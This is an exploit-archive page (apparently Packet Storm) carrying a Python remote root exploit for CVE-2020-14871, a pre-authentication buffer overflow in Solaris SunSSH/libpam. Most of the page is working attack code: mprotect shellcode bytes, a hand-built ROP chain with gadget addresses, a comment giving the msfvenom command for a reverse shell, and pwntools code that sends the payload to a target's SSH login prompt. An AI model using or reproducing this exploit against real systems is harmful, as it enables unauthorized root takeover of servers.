what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Solaris SunSSH 11.0 Remote Root

Solaris SunSSH 11.0 Remote Root
Posted Jun 22, 2021
Authored by Joe Rozner, Nathaniel Singer

Solaris SunSSH version 11.0 on x86 libpam remote root exploit.

tags | exploit, remote, x86, root
systems | solaris
advisories | CVE-2020-14871
SHA-256 | 678892d62f9d4edd74e135ec10ed7cd1fb0389a420617db1549d49e581caa0db

Solaris SunSSH 11.0 Remote Root

Change Mirror Download
# Exploit Title: Solaris SunSSH 11.0 x86 - libpam Remote Root (3)
# Exploit Author: Nathaniel Singer, Joe Rozner
# Date: 09/11/2020
# CVE: 2020-14871

# Vulnerable Version(s): Oracle Solaris: 9 (some releases), 10 (all releases), 11.0
# Description: CVE-2020-14871 is a critical pre-authentication (via SSH) stack-based buffer overflow vulnerability in the Pluggable Authentication Module (PAM) in Oracle Solaris. PAM is a dynamic authentication component that was integrated into Solaris back in 1997 as part of Solaris 2.6. The vulnerability received a CVSSv3 score of 10.0, the maximum possible score.

# Vendor Homepage: https://www.oracle.com/solaris
# Software Link: https://www.oracle.com/solaris/solaris10/downloads/solaris10-get-jsp-downloads.html
# Tested on: Software Hash (md5): aae1452bb3d56baa3dcb8866ce7e4a08 2254110720: sol-10-u11-ga-x86-dvd.iso

# Notes: We ran into an interesting LIBC descrepancy during testing. The sysenter gadget (0xfebbbbf4), last in the stage one chain, was accessible when the testing VM was running on a MacOS host, however, when we ran the vulnerable Solaris box on a Windows host, that gadget was not located at the same address and we actually were unable to find it anywhere in memory. Hopefully someone smarter than us can figure out why this is, but you may run into this during your testing as well.

#!/usr/bin/python3

from pwn import *

########## BUILD ##########
# mprotect shellcode, stage one to mark the page containing our shellcode as executable
buf = b"\x31\xc0\x31\xc9\xbb\x01\x40\x04\x08\x66\xb8\x01\x40"
buf += b"\xb1\x07\x4b\x48\x51\x50\x53\x53\x89\xe1\x31\xc0\xb0"
buf += b"\x74\xcd\x91"

# Actual stage two shellcode, drop into after mprotect call
# ./msfvenom -p solaris/x86/shell_reverse_tcp -b "\x20\x09\x00\x0d\x0a" LHOST="192.168.1.215" LPORT=4444 -f python
buf += b"<big bad effect here, as a bytestring; limit 512 bytes>"
pad = b'A'* (512-len(buf))

# manual assembly of ROP chain due to pwntools chainer bugs, DWORD returns :/
g = []
g.append(p32(0x080431c3)) #ebp overwrite to prevent ecx corrupt and crash
g.append(p32(0xfed86ca3)) #mov eax, 0x74; ret
g.append(p32(0x08072829)) #pop ebx; ret
g.append(p32(0x08040101)) #write ecx value (0x0a) to address, prevents crash
g.append(p32(0x0805ba07)) #pop ecx; pop edx; pop ebp
g.append(p32(0x08046ee0)) #ptr(0x?,0x0x1000,0x7)
g.append(p32(0x08043001)) #edx pointer to page+1 for mprotect
g.append(p32(0x080431b8)) #unused ebp value
g.append(p32(0x08072261)) #decrement edx so correct page addr
g.append(p32(0xfefe2d8b)) #mov DWORD PTR [ecx+0x4],edx; xor eax; ret
g.append(p32(0xfed86ca3)) #mov eax, 0x74; ret
g.append(p32(0x0805ba08)) #pop edx; pop ebp; ret
g.append(p32(0x080431b8)) #addr of shellcode
g.append(p32(0xfed86ca3)) #unused ebx value
g.append(p32(0xfebb56f6)) #sysenter (ret into sc via edx)
chain = b''.join(g) #assemble the list into a bytestring, final rop chain
print(f"Sending Exploit: {chain}")

########## EXPLOIT ##########
remote_host = "192.168.25.130”
io = process(f'/usr/bin/ssh -l \"\" -o \"PreferredAuthentications keyboard-interactive\" {remote_host}', shell=True, stdin=PTY)

io.recv() #username prompt
io.sendline(buf + pad + chain) #exploit

Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close